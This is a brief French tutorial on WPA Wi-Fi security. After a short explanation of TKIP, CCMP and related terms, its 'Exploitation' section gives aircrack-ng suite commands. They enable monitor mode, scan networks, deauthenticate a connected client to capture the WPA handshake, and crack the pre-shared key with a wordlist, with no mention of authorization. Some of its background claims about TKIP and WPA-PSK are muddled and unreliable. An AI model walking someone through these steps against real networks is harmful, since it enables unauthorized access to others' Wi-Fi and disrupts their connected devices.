**WPA** Wi-Fi Protected Access (WPA et WPA2) est un mécanisme pour sécuriser les réseaux sans-fil de type Wi-Fi. Le WPA était une norme temporaire pour palier au manque de sécurité du WEP. La norme a été implémentée dans l'idée d'être remplacée rapidement par le WPA2. Elle utilise deux types d'authentifications : - TKIP (Temporal Key Integrity Protocol) : une clé de 128 bits est utilisée pour chaque paquet. On génère une nouvelle clé pour chaque paquet. - CCMP : un mécanisme de chiffrement qui s'appuie sur AES et qui est plus robuste que le TKIP. __Vocabulaire utilisé :__ - BSSID : est l'adresse mac du point d'accès wifi. - ESSID : est le nom du réseau wifi (exemple: Bbox-AFXXX) - Handshake : est un échange de clé entre un routeur wifi et un client. - Channel : est le canal sur lequel est diffusé le réseau wifi. Sur les réseaux des particuliers le WPA-PSK est utilisé (Preshared key). LE WPA-PSK utilise le TKIP comme authentification. __Exploitation__ Pour commencer, assurez vous que votre carte wifi supporte le monitoring. Pour l'activer : airmon-ng start wlan0 Dans mon cas wlan0 est mon interface wifi. Nous allons ensuite lister les wifi en WPA : airodump-ng --encrypt wpa mon0 --encrypt permet de filtrer les réseaux wifi par chiffrement mon0 est notre interface de monitoring Pour obtenir un station : airodump-ng -a -c [chan] --bssid [APmac] -w [outfile][iface] Dès qu'une station apparait : aireplay-ng -0 1 -e [ESSID] -a [BSSID] -c [Client MAC] [iface] augmenter le 1 si ça n'a pas suffit à obtenir un handshake. Pour vérifier si le handshake est capturé ,lancez aircrack-ng outfile.cap __pour obtenir la clé :__ aircrack -w dictionnaire -b [bssid] outfile.cap